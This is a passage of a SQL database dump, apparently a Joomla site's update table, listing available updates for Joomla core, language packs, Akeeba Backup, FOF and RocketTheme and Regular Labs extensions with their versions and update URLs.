Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11630,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11631,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11632,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11633,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11634,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11635,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11636,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11637,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11638,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11639,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11640,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11641,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11642,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11643,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11644,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11645,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11646,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11647,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11648,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11649,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11650,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11651,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11652,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11653,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11654,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11655,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11656,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11657,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11658,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11659,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11660,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11661,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11662,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11663,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11664,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11665,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11666,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11667,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11668,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11669,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11670,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11671,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11672,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11673,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11674,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11675,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11676,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11677,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11678,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11679,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11680,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11681,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11682,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11683,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11684,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11685,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11686,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11687,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11688,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11689,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11690,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11691,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11692,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11693,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11694,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11695,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11696,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11697,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11698,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11699,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11700,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11701,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11702,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11703,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11704,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11705,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11706,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11707,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11708,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11709,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11710,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11711,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11712,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11713,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11714,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11715,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11716,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11717,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11718,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11719,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11720,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11721,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11722,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11723,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11724,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11725,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11726,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11727,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11728,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11729,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11730,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11731,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11732,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11733,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11734,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11735,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11736,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11737,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11738,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11739,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11740,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11741,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11742,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11743,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11744,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11745,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11746,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(11747,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(11748,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(11749,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(11750,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(11751,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(11752,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(11753,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11754,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11755,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11756,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11757,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11758,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11759,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11760,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11761,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11762,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11763,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11764,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11765,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11766,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11767,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11768,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11769,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11770,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11771,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11772,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11773,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11774,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11775,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11776,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11777,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11778,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11779,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11780,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11781,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11782,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(11783,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(11784,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(11785,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(11786,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(11787,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(11788,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(11789,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(11790,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(11791,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(11792,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(11793,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(11794,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(11795,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(11796,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(11797,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(11798,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(11799,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(11800,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(11801,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11802,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(11803,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(11804,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(11805,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11806,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11807,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11808,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11809,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-2.html\n				',''),(11810,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11811,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(11812,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(11813,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(11814,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(11815,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(11816,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(11817,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(11818,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(11819,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(11820,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(11821,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(11822,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(11823,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(11824,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(11825,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(11826,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(11827,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(11828,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(11829,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(11830,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(11831,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(11832,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(11833,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(11834,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(11835,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(11836,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.2','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(11837,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(11838,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(11839,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(11840,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(11841,3,0,'German 